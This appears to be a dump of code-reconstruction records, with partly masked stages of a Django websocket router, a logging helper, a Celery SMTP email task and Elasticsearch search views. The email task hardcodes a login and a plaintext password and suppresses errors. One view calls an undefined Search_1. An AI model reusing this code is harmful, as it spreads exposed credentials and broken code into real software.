"step-2": "<mask token>\nwebsocket_urlpatterns = [url('^account/home', consumers.\n NotificationConsumer), url('^fund/(?P<fund>[\\\\w-]+)', consumers.\n NotificationConsumer), url('^websockets', consumers.StreamConsumer)]\n",
"step-3": "from django.conf.urls import url\nfrom . import consumers\nwebsocket_urlpatterns = [url('^account/home', consumers.\n NotificationConsumer), url('^fund/(?P<fund>[\\\\w-]+)', consumers.\n NotificationConsumer), url('^websockets', consumers.StreamConsumer)]\n",
"step-4": "from django.conf.urls import url\n\nfrom . import consumers\n\nwebsocket_urlpatterns = [\n url(r'^account/home', consumers.NotificationConsumer),\n url(r'^fund/(?P<fund>[\\w-]+)', consumers.NotificationConsumer),\n url(r'^websockets', consumers.StreamConsumer),\n]",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def get_common_logger(name='common', logfile=None):
"""
args: name (str): logger name
logfile (str): log file, use stream handler (stdout) as default.
return:
logger obj
"""
my_logger = logging.getLogger(name)
my_logger.setLevel(config.LOG_LEVEL)
if logfile:
handler = logging.FileHandler(logfile)
else:
handler = logging.StreamHandler()
formatter = logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(filename)s - %(funcName)s - %(lineno)s - %(message)s'
)
handler.setFormatter(formatter)
my_logger.addHandler(handler)
my_logger.propagate = False
return my_logger
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_common_logger(name='common', logfile=None):
"""
args: name (str): logger name
logfile (str): log file, use stream handler (stdout) as default.
return:
logger obj
"""
my_logger = logging.getLogger(name)
my_logger.setLevel(config.LOG_LEVEL)
if logfile:
handler = logging.FileHandler(logfile)
else:
handler = logging.StreamHandler()
formatter = logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(filename)s - %(funcName)s - %(lineno)s - %(message)s'
)
handler.setFormatter(formatter)
my_logger.addHandler(handler)
my_logger.propagate = False
return my_logger
<|reserved_special_token_0|>
if __name__ == '__main__':
COMMON_LOGGER.debug('test')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_common_logger(name='common', logfile=None):
"""
args: name (str): logger name
logfile (str): log file, use stream handler (stdout) as default.
return:
logger obj
"""
my_logger = logging.getLogger(name)
my_logger.setLevel(config.LOG_LEVEL)
if logfile:
handler = logging.FileHandler(logfile)
else:
handler = logging.StreamHandler()
formatter = logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(filename)s - %(funcName)s - %(lineno)s - %(message)s'
)
handler.setFormatter(formatter)
my_logger.addHandler(handler)
my_logger.propagate = False
return my_logger
COMMON_LOGGER = get_common_logger('common logger')
if __name__ == '__main__':
COMMON_LOGGER.debug('test')
<|reserved_special_token_1|>
import logging
import config
def get_common_logger(name='common', logfile=None):
"""
args: name (str): logger name
logfile (str): log file, use stream handler (stdout) as default.
return:
logger obj
"""
my_logger = logging.getLogger(name)
my_logger.setLevel(config.LOG_LEVEL)
if logfile:
handler = logging.FileHandler(logfile)
else:
handler = logging.StreamHandler()
formatter = logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(filename)s - %(funcName)s - %(lineno)s - %(message)s'
)
handler.setFormatter(formatter)
my_logger.addHandler(handler)
my_logger.propagate = False
return my_logger
COMMON_LOGGER = get_common_logger('common logger')
if __name__ == '__main__':
COMMON_LOGGER.debug('test')
<|reserved_special_token_1|>
#!/usr/bin/env python
# coding: utf-8
import logging
import config
def get_common_logger(name='common', logfile=None):
'''
args: name (str): logger name
logfile (str): log file, use stream handler (stdout) as default.
return:
logger obj
'''
my_logger = logging.getLogger(name)
my_logger.setLevel(config.LOG_LEVEL)
if logfile:
handler = logging.FileHandler(logfile)
else:
handler = logging.StreamHandler()
formatter = logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(filename)s - %(funcName)s - %(lineno)s - %(message)s')
handler.setFormatter(formatter)
my_logger.addHandler(handler)
# Stop logger propagate, forbiden duplicate log.
my_logger.propagate = False
return my_logger
COMMON_LOGGER = get_common_logger('common logger')
if __name__ == '__main__':
COMMON_LOGGER.debug('test')
|
flexible
|
{
"blob_id": "1754bce54a47cb78dce3b545d3dce835a4e0e69f",
"index": 947,
"step-1": "<mask token>\n\n\ndef get_common_logger(name='common', logfile=None):\n \"\"\"\n args: name (str): logger name\n logfile (str): log file, use stream handler (stdout) as default.\n return:\n logger obj\n \"\"\"\n my_logger = logging.getLogger(name)\n my_logger.setLevel(config.LOG_LEVEL)\n if logfile:\n handler = logging.FileHandler(logfile)\n else:\n handler = logging.StreamHandler()\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(filename)s - %(funcName)s - %(lineno)s - %(message)s'\n )\n handler.setFormatter(formatter)\n my_logger.addHandler(handler)\n my_logger.propagate = False\n return my_logger\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_common_logger(name='common', logfile=None):\n \"\"\"\n args: name (str): logger name\n logfile (str): log file, use stream handler (stdout) as default.\n return:\n logger obj\n \"\"\"\n my_logger = logging.getLogger(name)\n my_logger.setLevel(config.LOG_LEVEL)\n if logfile:\n handler = logging.FileHandler(logfile)\n else:\n handler = logging.StreamHandler()\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(filename)s - %(funcName)s - %(lineno)s - %(message)s'\n )\n handler.setFormatter(formatter)\n my_logger.addHandler(handler)\n my_logger.propagate = False\n return my_logger\n\n\n<mask token>\nif __name__ == '__main__':\n COMMON_LOGGER.debug('test')\n",
"step-3": "<mask token>\n\n\ndef get_common_logger(name='common', logfile=None):\n \"\"\"\n args: name (str): logger name\n logfile (str): log file, use stream handler (stdout) as default.\n return:\n logger obj\n \"\"\"\n my_logger = logging.getLogger(name)\n my_logger.setLevel(config.LOG_LEVEL)\n if logfile:\n handler = logging.FileHandler(logfile)\n else:\n handler = logging.StreamHandler()\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(filename)s - %(funcName)s - %(lineno)s - %(message)s'\n )\n handler.setFormatter(formatter)\n my_logger.addHandler(handler)\n my_logger.propagate = False\n return my_logger\n\n\nCOMMON_LOGGER = get_common_logger('common logger')\nif __name__ == '__main__':\n COMMON_LOGGER.debug('test')\n",
"step-4": "import logging\nimport config\n\n\ndef get_common_logger(name='common', logfile=None):\n \"\"\"\n args: name (str): logger name\n logfile (str): log file, use stream handler (stdout) as default.\n return:\n logger obj\n \"\"\"\n my_logger = logging.getLogger(name)\n my_logger.setLevel(config.LOG_LEVEL)\n if logfile:\n handler = logging.FileHandler(logfile)\n else:\n handler = logging.StreamHandler()\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(filename)s - %(funcName)s - %(lineno)s - %(message)s'\n )\n handler.setFormatter(formatter)\n my_logger.addHandler(handler)\n my_logger.propagate = False\n return my_logger\n\n\nCOMMON_LOGGER = get_common_logger('common logger')\nif __name__ == '__main__':\n COMMON_LOGGER.debug('test')\n",
"step-5": "#!/usr/bin/env python\n# coding: utf-8\n\nimport logging\n\nimport config\n\n\ndef get_common_logger(name='common', logfile=None):\n '''\n args: name (str): logger name\n logfile (str): log file, use stream handler (stdout) as default.\n return:\n logger obj\n '''\n my_logger = logging.getLogger(name)\n my_logger.setLevel(config.LOG_LEVEL)\n if logfile:\n handler = logging.FileHandler(logfile)\n else:\n handler = logging.StreamHandler()\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(filename)s - %(funcName)s - %(lineno)s - %(message)s')\n handler.setFormatter(formatter)\n my_logger.addHandler(handler)\n # Stop logger propagate, forbiden duplicate log.\n my_logger.propagate = False\n return my_logger\n\n\nCOMMON_LOGGER = get_common_logger('common logger')\n\nif __name__ == '__main__':\n COMMON_LOGGER.debug('test')\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from tilBackend.celery import app
import smtplib
import email
import ssl
#librerias pruebas
from celery.task.schedules import crontab
from celery.decorators import periodic_task
from celery.utils.log import get_task_logger
from celery import Celery
@app.task
def correo():
try:
port = 587
smtp_server = "smtp-mail.outlook.com"
user = '[email protected]'
password = "Python123"
message ="""Subject: Asuntooooo\n
Y este es el mensaje
"""
conn = smtplib.SMTP(smtp_server,587)
conn.ehlo()
conn.starttls()
conn.login(user,password)
#for x in range(0,10):
conn.sendmail(user,'[email protected]',message)
conn.quit
except:
print("Algo fallo")
def task_correo():
"""
envia correo
"""
correo()
logger.info("se envio el correo")
app.conf.update
|
normal
|
{
"blob_id": "d0a6bfb729a150863303621a136ae80e96ae32d0",
"index": 3250,
"step-1": "<mask token>\n\n\ndef task_correo():\n \"\"\"\n envia correo\n \"\"\"\n correo()\n logger.info('se envio el correo')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]\ndef correo():\n try:\n port = 587\n smtp_server = 'smtp-mail.outlook.com'\n user = '[email protected]'\n password = 'Python123'\n message = \"\"\"Subject: Asuntooooo\n\n Y este es el mensaje\n \"\"\"\n conn = smtplib.SMTP(smtp_server, 587)\n conn.ehlo()\n conn.starttls()\n conn.login(user, password)\n conn.sendmail(user, '[email protected]', message)\n conn.quit\n except:\n print('Algo fallo')\n\n\ndef task_correo():\n \"\"\"\n envia correo\n \"\"\"\n correo()\n logger.info('se envio el correo')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\[email protected]\ndef correo():\n try:\n port = 587\n smtp_server = 'smtp-mail.outlook.com'\n user = '[email protected]'\n password = 'Python123'\n message = \"\"\"Subject: Asuntooooo\n\n Y este es el mensaje\n \"\"\"\n conn = smtplib.SMTP(smtp_server, 587)\n conn.ehlo()\n conn.starttls()\n conn.login(user, password)\n conn.sendmail(user, '[email protected]', message)\n conn.quit\n except:\n print('Algo fallo')\n\n\ndef task_correo():\n \"\"\"\n envia correo\n \"\"\"\n correo()\n logger.info('se envio el correo')\n\n\napp.conf.update\n",
"step-4": "from tilBackend.celery import app\nimport smtplib\nimport email\nimport ssl\nfrom celery.task.schedules import crontab\nfrom celery.decorators import periodic_task\nfrom celery.utils.log import get_task_logger\nfrom celery import Celery\n\n\[email protected]\ndef correo():\n try:\n port = 587\n smtp_server = 'smtp-mail.outlook.com'\n user = '[email protected]'\n password = 'Python123'\n message = \"\"\"Subject: Asuntooooo\n\n Y este es el mensaje\n \"\"\"\n conn = smtplib.SMTP(smtp_server, 587)\n conn.ehlo()\n conn.starttls()\n conn.login(user, password)\n conn.sendmail(user, '[email protected]', message)\n conn.quit\n except:\n print('Algo fallo')\n\n\ndef task_correo():\n \"\"\"\n envia correo\n \"\"\"\n correo()\n logger.info('se envio el correo')\n\n\napp.conf.update\n",
"step-5": "from tilBackend.celery import app\nimport smtplib\nimport email\nimport ssl\n#librerias pruebas\nfrom celery.task.schedules import crontab\nfrom celery.decorators import periodic_task\nfrom celery.utils.log import get_task_logger\nfrom celery import Celery\n\[email protected]\ndef correo():\n try:\n port = 587\n smtp_server = \"smtp-mail.outlook.com\"\n user = '[email protected]'\n password = \"Python123\"\n message =\"\"\"Subject: Asuntooooo\\n\n Y este es el mensaje\n \"\"\"\n conn = smtplib.SMTP(smtp_server,587)\n conn.ehlo()\n conn.starttls()\n conn.login(user,password)\n #for x in range(0,10):\n conn.sendmail(user,'[email protected]',message)\n conn.quit\n except:\n print(\"Algo fallo\")\n\n\n\n\ndef task_correo():\n \"\"\"\n envia correo\n \"\"\"\n correo()\n logger.info(\"se envio el correo\")\n\n\n\napp.conf.update\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print(f'Текст:{x}')
print(f'Число:{y}')
<|reserved_special_token_0|>
print(f'Вы ввели числа: {a1}/{a2}')
print(f'Вы ввели строки: {b1} / {b2}')
<|reserved_special_token_1|>
y = 10
x = 'Тишь да гладь'
print(f'Текст:{x}')
print(f'Число:{y}')
a1 = input('Введите первое число: ')
a2 = input('Введите второе число: ')
b1 = input('Введите первую строку: ')
b2 = input('Введите вторую строку: ')
print(f'Вы ввели числа: {a1}/{a2}')
print(f'Вы ввели строки: {b1} / {b2}')
|
flexible
|
{
"blob_id": "2fabb03f0f6b0b297245354782e650380509424b",
"index": 8054,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(f'Текст:{x}')\nprint(f'Число:{y}')\n<mask token>\nprint(f'Вы ввели числа: {a1}/{a2}')\nprint(f'Вы ввели строки: {b1} / {b2}')\n",
"step-3": "y = 10\nx = 'Тишь да гладь'\nprint(f'Текст:{x}')\nprint(f'Число:{y}')\na1 = input('Введите первое число: ')\na2 = input('Введите второе число: ')\nb1 = input('Введите первую строку: ')\nb2 = input('Введите вторую строку: ')\nprint(f'Вы ввели числа: {a1}/{a2}')\nprint(f'Вы ввели строки: {b1} / {b2}')\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
class SearchSuggest(View):
<|reserved_special_token_0|>
class SearchDetail(View):
def get(self, request):
key_words = request.GET.get('q', '')
data = {}
if key_words:
es = Elasticsearch(hosts=['127.0.0.1'])
s = Search(index='zntg_2').using(es).query('match',
company_name=key_words)
for i in s[0]:
data['company_name'] = i.company_name
data['crn'] = i.crn
try:
data['former_name'] = str(i.former_name)
except:
pass
data['organization_type'] = i.organization_type
data['faren'] = i.faren
data['registered_capital'] = i.registered_capital
data['company_type'] = i.company_type
data['registration_state'] = i.registration_state
data['searched_by'] = str(i.searched_by)
data['data_count'] = i.data_count
return HttpResponse(json.dumps(data), content_type='application/json')
class CodeSearch(View):
def get(self, request):
key_words = request.GET.get('code', '')
print(key_words)
search = Search_1()
data = search.get_data(key_words)
print(data)
return JsonResponse(data)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class SearchSuggest(View):
def get(self, request):
key_words = request.GET.get('s', '')
re_datas = []
com_datas = []
if key_words:
es = Elasticsearch(hosts=['127.0.0.1'])
s = Search(index='zntg_2').using(es).query('match',
company_name=key_words)
for i in s:
re_datas.append(i.company_name)
res = s.execute()
return HttpResponse(json.dumps(re_datas), content_type=
'application/json')
class SearchDetail(View):
def get(self, request):
key_words = request.GET.get('q', '')
data = {}
if key_words:
es = Elasticsearch(hosts=['127.0.0.1'])
s = Search(index='zntg_2').using(es).query('match',
company_name=key_words)
for i in s[0]:
data['company_name'] = i.company_name
data['crn'] = i.crn
try:
data['former_name'] = str(i.former_name)
except:
pass
data['organization_type'] = i.organization_type
data['faren'] = i.faren
data['registered_capital'] = i.registered_capital
data['company_type'] = i.company_type
data['registration_state'] = i.registration_state
data['searched_by'] = str(i.searched_by)
data['data_count'] = i.data_count
return HttpResponse(json.dumps(data), content_type='application/json')
class CodeSearch(View):
def get(self, request):
key_words = request.GET.get('code', '')
print(key_words)
search = Search_1()
data = search.get_data(key_words)
print(data)
return JsonResponse(data)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class SearchSuggest(View):
def get(self, request):
key_words = request.GET.get('s', '')
re_datas = []
com_datas = []
if key_words:
es = Elasticsearch(hosts=['127.0.0.1'])
s = Search(index='zntg_2').using(es).query('match',
company_name=key_words)
for i in s:
re_datas.append(i.company_name)
res = s.execute()
return HttpResponse(json.dumps(re_datas), content_type=
'application/json')
class SearchDetail(View):
def get(self, request):
key_words = request.GET.get('q', '')
data = {}
if key_words:
es = Elasticsearch(hosts=['127.0.0.1'])
s = Search(index='zntg_2').using(es).query('match',
company_name=key_words)
for i in s[0]:
data['company_name'] = i.company_name
data['crn'] = i.crn
try:
data['former_name'] = str(i.former_name)
except:
pass
data['organization_type'] = i.organization_type
data['faren'] = i.faren
data['registered_capital'] = i.registered_capital
data['company_type'] = i.company_type
data['registration_state'] = i.registration_state
data['searched_by'] = str(i.searched_by)
data['data_count'] = i.data_count
return HttpResponse(json.dumps(data), content_type='application/json')
class CodeSearch(View):
def get(self, request):
key_words = request.GET.get('code', '')
print(key_words)
search = Search_1()
data = search.get_data(key_words)
print(data)
return JsonResponse(data)
if __name__ == '__main__':
es = Elasticsearch(hosts=['127.0.0.1'])
s = Search(index='zntg_2').using(es).query('match', company_name=
'延安一正启源科技发展股份有限公司')
res = s.execute()
a = res['hits']['hits'][0]['_source']
print(a['former_name'])
<|reserved_special_token_1|>
from django.http import HttpResponse, JsonResponse
from django.shortcuts import render
from django.views.generic.base import View
from elasticsearch import Elasticsearch
from elasticsearch_dsl import Search
import json
class SearchSuggest(View):
    """Company-name autocomplete endpoint driven by the ``s`` parameter."""

    def get(self, request):
        """Return a JSON array of company names whose name matches ``s``."""
        term = request.GET.get('s', '')
        suggestions = []
        if term:
            client = Elasticsearch(hosts=['127.0.0.1'])
            query = Search(index='zntg_2').using(client).query(
                'match', company_name=term)
            # Iterating the Search object runs the query and yields hits.
            suggestions = [hit.company_name for hit in query]
            res = query.execute()  # kept: original issued this second request too
        return HttpResponse(json.dumps(suggestions),
                            content_type='application/json')
class SearchDetail(View):
    """Return the full detail record of the company matching the ``q`` parameter."""

    def get(self, request):
        """Serialize selected fields of the best-matching company as JSON.

        An empty ``q`` yields an empty JSON object.
        """
        key_words = request.GET.get('q', '')
        data = {}
        if key_words:
            es = Elasticsearch(hosts=['127.0.0.1'])
            s = Search(index='zntg_2').using(es).query('match',
                company_name=key_words)
            # s[0] narrows the result window to the single best hit.
            for i in s[0]:
                data['company_name'] = i.company_name
                data['crn'] = i.crn
                try:
                    data['former_name'] = str(i.former_name)
                except (AttributeError, KeyError):
                    # former_name is optional on the document; skip when absent.
                    # (was a bare `except:`, which also swallowed SystemExit etc.)
                    pass
                data['organization_type'] = i.organization_type
                data['faren'] = i.faren
                data['registered_capital'] = i.registered_capital
                data['company_type'] = i.company_type
                data['registration_state'] = i.registration_state
                data['searched_by'] = str(i.searched_by)
                data['data_count'] = i.data_count
        return HttpResponse(json.dumps(data), content_type='application/json')
class CodeSearch(View):
    """Look up company data by a ``code`` query parameter."""

    def get(self, request):
        key_words = request.GET.get('code', '')
        print(key_words)  # debug output
        # NOTE(review): Search_1 is not defined or imported in this file as
        # shown — this raises NameError at request time. Confirm the import.
        search = Search_1()
        data = search.get_data(key_words)
        print(data)  # debug output
        return JsonResponse(data)
if __name__ == '__main__':
    # Ad-hoc manual check: query one known company and print its former name.
    es = Elasticsearch(hosts=['127.0.0.1'])
    s = Search(index='zntg_2').using(es).query('match', company_name=
        '延安一正启源科技发展股份有限公司')
    res = s.execute()
    # NOTE(review): indexes the Response like a raw ES payload — confirm the
    # installed elasticsearch_dsl version supports res['hits']['hits'].
    a = res['hits']['hits'][0]['_source']
    print(a['former_name'])
<|reserved_special_token_1|>
from django.http import HttpResponse, JsonResponse
from django.shortcuts import render
from django.views.generic.base import View
from elasticsearch import Elasticsearch
from elasticsearch_dsl import Search
# from com_search.get_info import Search as Search_1
# from com_search.models import CompanyType
import json
# Create your views here.
class SearchSuggest(View):
    """Autocomplete endpoint: company names matching the ``s`` query parameter."""

    def get(self, request):
        """Return a JSON array of company names matching ``s``.

        An empty ``s`` yields an empty list. The ~20 lines of commented-out
        completion-suggester code were removed; the redundant second
        ``s.execute()`` round-trip (result unused — iteration already ran the
        query) and the unused ``com_datas`` local were dropped as well.
        """
        key_words = request.GET.get('s', '')
        re_datas = []
        if key_words:
            es = Elasticsearch(hosts=["127.0.0.1"])
            s = Search(index='zntg_2').using(es).query('match', company_name=key_words)
            # Iterating the Search object executes it and yields hit objects.
            for hit in s:
                re_datas.append(hit.company_name)
        return HttpResponse(json.dumps(re_datas), content_type="application/json")
class SearchDetail(View):
    """Return the full detail record of the company matching the ``q`` parameter."""

    def get(self, request):
        """Serialize selected fields of the best-matching company as JSON.

        An empty ``q`` yields an empty JSON object.
        """
        key_words = request.GET.get('q', '')
        data = {}
        if key_words:
            es = Elasticsearch(hosts=["127.0.0.1"])
            s = Search(index='zntg_2').using(es).query('match', company_name=key_words)
            # s[0] restricts the result window to the single best hit.
            for i in s[0]:
                data['company_name'] = i.company_name
                data['crn'] = i.crn
                try:
                    data['former_name'] = str(i.former_name)
                except (AttributeError, KeyError):
                    # former_name is optional on the document; skip when absent.
                    # (was a bare `except:`, which also hid SystemExit/KeyboardInterrupt)
                    pass
                data['organization_type'] = i.organization_type
                data['faren'] = i.faren
                data['registered_capital'] = i.registered_capital
                data['company_type'] = i.company_type
                data['registration_state'] = i.registration_state
                data['searched_by'] = str(i.searched_by)
                data['data_count'] = i.data_count
        return HttpResponse(json.dumps(data), content_type="application/json")
class CodeSearch(View):
    """Look up company data by a ``code`` query parameter."""

    def get(self, request):
        key_words = request.GET.get('code', '')
        print(key_words)  # debug output
        # NOTE(review): the `Search_1` import is commented out at the top of
        # this file, so this line raises NameError at request time — restore
        # `from com_search.get_info import Search as Search_1` before use.
        search = Search_1()
        data = search.get_data(key_words)
        # text = {'code': key_words}
        # print(json.dumps(text))
        print(data)  # debug output
        return JsonResponse(data)
if __name__ == '__main__':
    # Ad-hoc manual check: query one known company and print its former name.
    # client = Elasticsearch(hosts=["127.0.0.1"])
    # Create the Elasticsearch client instance.
    es = Elasticsearch(hosts=["127.0.0.1"])
    # `using` binds the client object; `index` narrows the search scope and
    # accepts a list of indices (e.g. ["bank", "banner", "country"]) or
    # wildcard patterns such as ["b*"]; Search can also target a doc-type.
    # s = Search(using=client, index="zntg_5")
    # q = {"query": {"match": {"name": "easy"}}}
    # res = es.Search(body=q)
    # print(res)
    s = Search(index='zntg_2').using(es).query('match', company_name='延安一正启源科技发展股份有限公司')
    # for i in s[0]:
    #     print(i.company_name)
    #     print(i.company_type)
    res = s.execute()
    # print(res)
    # res = es.get(index="zntg_5", doc_type="company", id='AWQ7fKZzZ2odEMYJXOY0')
    # print(res["hits"]["hits"][0]['_source'])
    a = res["hits"]["hits"][0]['_source']
    print(a['former_name'])
|
flexible
|
{
"blob_id": "e5e7856d752f14e0671bae8d8b7997207c667ae1",
"index": 6602,
"step-1": "<mask token>\n\n\nclass SearchSuggest(View):\n <mask token>\n\n\nclass SearchDetail(View):\n\n def get(self, request):\n key_words = request.GET.get('q', '')\n data = {}\n if key_words:\n es = Elasticsearch(hosts=['127.0.0.1'])\n s = Search(index='zntg_2').using(es).query('match',\n company_name=key_words)\n for i in s[0]:\n data['company_name'] = i.company_name\n data['crn'] = i.crn\n try:\n data['former_name'] = str(i.former_name)\n except:\n pass\n data['organization_type'] = i.organization_type\n data['faren'] = i.faren\n data['registered_capital'] = i.registered_capital\n data['company_type'] = i.company_type\n data['registration_state'] = i.registration_state\n data['searched_by'] = str(i.searched_by)\n data['data_count'] = i.data_count\n return HttpResponse(json.dumps(data), content_type='application/json')\n\n\nclass CodeSearch(View):\n\n def get(self, request):\n key_words = request.GET.get('code', '')\n print(key_words)\n search = Search_1()\n data = search.get_data(key_words)\n print(data)\n return JsonResponse(data)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass SearchSuggest(View):\n\n def get(self, request):\n key_words = request.GET.get('s', '')\n re_datas = []\n com_datas = []\n if key_words:\n es = Elasticsearch(hosts=['127.0.0.1'])\n s = Search(index='zntg_2').using(es).query('match',\n company_name=key_words)\n for i in s:\n re_datas.append(i.company_name)\n res = s.execute()\n return HttpResponse(json.dumps(re_datas), content_type=\n 'application/json')\n\n\nclass SearchDetail(View):\n\n def get(self, request):\n key_words = request.GET.get('q', '')\n data = {}\n if key_words:\n es = Elasticsearch(hosts=['127.0.0.1'])\n s = Search(index='zntg_2').using(es).query('match',\n company_name=key_words)\n for i in s[0]:\n data['company_name'] = i.company_name\n data['crn'] = i.crn\n try:\n data['former_name'] = str(i.former_name)\n except:\n pass\n data['organization_type'] = i.organization_type\n data['faren'] = i.faren\n data['registered_capital'] = i.registered_capital\n data['company_type'] = i.company_type\n data['registration_state'] = i.registration_state\n data['searched_by'] = str(i.searched_by)\n data['data_count'] = i.data_count\n return HttpResponse(json.dumps(data), content_type='application/json')\n\n\nclass CodeSearch(View):\n\n def get(self, request):\n key_words = request.GET.get('code', '')\n print(key_words)\n search = Search_1()\n data = search.get_data(key_words)\n print(data)\n return JsonResponse(data)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass SearchSuggest(View):\n\n def get(self, request):\n key_words = request.GET.get('s', '')\n re_datas = []\n com_datas = []\n if key_words:\n es = Elasticsearch(hosts=['127.0.0.1'])\n s = Search(index='zntg_2').using(es).query('match',\n company_name=key_words)\n for i in s:\n re_datas.append(i.company_name)\n res = s.execute()\n return HttpResponse(json.dumps(re_datas), content_type=\n 'application/json')\n\n\nclass SearchDetail(View):\n\n def get(self, request):\n key_words = request.GET.get('q', '')\n data = {}\n if key_words:\n es = Elasticsearch(hosts=['127.0.0.1'])\n s = Search(index='zntg_2').using(es).query('match',\n company_name=key_words)\n for i in s[0]:\n data['company_name'] = i.company_name\n data['crn'] = i.crn\n try:\n data['former_name'] = str(i.former_name)\n except:\n pass\n data['organization_type'] = i.organization_type\n data['faren'] = i.faren\n data['registered_capital'] = i.registered_capital\n data['company_type'] = i.company_type\n data['registration_state'] = i.registration_state\n data['searched_by'] = str(i.searched_by)\n data['data_count'] = i.data_count\n return HttpResponse(json.dumps(data), content_type='application/json')\n\n\nclass CodeSearch(View):\n\n def get(self, request):\n key_words = request.GET.get('code', '')\n print(key_words)\n search = Search_1()\n data = search.get_data(key_words)\n print(data)\n return JsonResponse(data)\n\n\nif __name__ == '__main__':\n es = Elasticsearch(hosts=['127.0.0.1'])\n s = Search(index='zntg_2').using(es).query('match', company_name=\n '延安一正启源科技发展股份有限公司')\n res = s.execute()\n a = res['hits']['hits'][0]['_source']\n print(a['former_name'])\n",
"step-4": "from django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render\nfrom django.views.generic.base import View\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch_dsl import Search\nimport json\n\n\nclass SearchSuggest(View):\n\n def get(self, request):\n key_words = request.GET.get('s', '')\n re_datas = []\n com_datas = []\n if key_words:\n es = Elasticsearch(hosts=['127.0.0.1'])\n s = Search(index='zntg_2').using(es).query('match',\n company_name=key_words)\n for i in s:\n re_datas.append(i.company_name)\n res = s.execute()\n return HttpResponse(json.dumps(re_datas), content_type=\n 'application/json')\n\n\nclass SearchDetail(View):\n\n def get(self, request):\n key_words = request.GET.get('q', '')\n data = {}\n if key_words:\n es = Elasticsearch(hosts=['127.0.0.1'])\n s = Search(index='zntg_2').using(es).query('match',\n company_name=key_words)\n for i in s[0]:\n data['company_name'] = i.company_name\n data['crn'] = i.crn\n try:\n data['former_name'] = str(i.former_name)\n except:\n pass\n data['organization_type'] = i.organization_type\n data['faren'] = i.faren\n data['registered_capital'] = i.registered_capital\n data['company_type'] = i.company_type\n data['registration_state'] = i.registration_state\n data['searched_by'] = str(i.searched_by)\n data['data_count'] = i.data_count\n return HttpResponse(json.dumps(data), content_type='application/json')\n\n\nclass CodeSearch(View):\n\n def get(self, request):\n key_words = request.GET.get('code', '')\n print(key_words)\n search = Search_1()\n data = search.get_data(key_words)\n print(data)\n return JsonResponse(data)\n\n\nif __name__ == '__main__':\n es = Elasticsearch(hosts=['127.0.0.1'])\n s = Search(index='zntg_2').using(es).query('match', company_name=\n '延安一正启源科技发展股份有限公司')\n res = s.execute()\n a = res['hits']['hits'][0]['_source']\n print(a['former_name'])\n",
"step-5": "from django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render\nfrom django.views.generic.base import View\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch_dsl import Search\n# from com_search.get_info import Search as Search_1\n# from com_search.models import CompanyType\nimport json\n# Create your views here.\n\n\nclass SearchSuggest(View):\n def get(self, request):\n key_words = request.GET.get('s','')\n # print(key_words, '===============')\n re_datas = []\n com_datas = []\n if key_words:\n\n es = Elasticsearch(hosts=[\"127.0.0.1\"])\n s = Search(index='zntg_2').using(es).query('match', company_name=key_words)\n for i in s:\n re_datas.append(i.company_name)\n res = s.execute()\n\n # s = CompanyType.search()\n # s = s.suggest('my_suggest', key_words, completion={\n # \"field\": \"suggest\", \"fuzzy\": {\n # \"fuzziness\": 2\n # },\n # \"size\": 10\n # })\n # suggestions = s.execute_suggest()\n # for match in suggestions.my_suggest[0].options:\n # for match in suggestions.my_suggest[0].options:\n # source = match._source\n # com_datas.append(str(source))\n # re_datas.append(source[\"company_name\"])\n # print(source)\n # print(re_datas)\n # # print(suggestions['my_suggest'][0])\n # # print(suggestions['my_suggest'][0]['options'])\n # print(json.dumps(re_datas))\n # print(com_datas)\n # print(json.dumps(com_datas))\n return HttpResponse(json.dumps(re_datas), content_type=\"application/json\")\n\n\nclass SearchDetail(View):\n def get(self, request):\n key_words = request.GET.get('q', '')\n # print(key_words, '===============')\n data = {}\n if key_words:\n es = Elasticsearch(hosts=[\"127.0.0.1\"])\n s = Search(index='zntg_2').using(es).query('match', company_name=key_words)\n for i in s[0]:\n # print(i.company_name)\n # for k in ['company_name', 'crn', 'former_name', 'organization_type', 'faren', 'registered_capital', 'company_type', 'registration_state', 'searched_by', 'data_count']:\n\n data['company_name'] = 
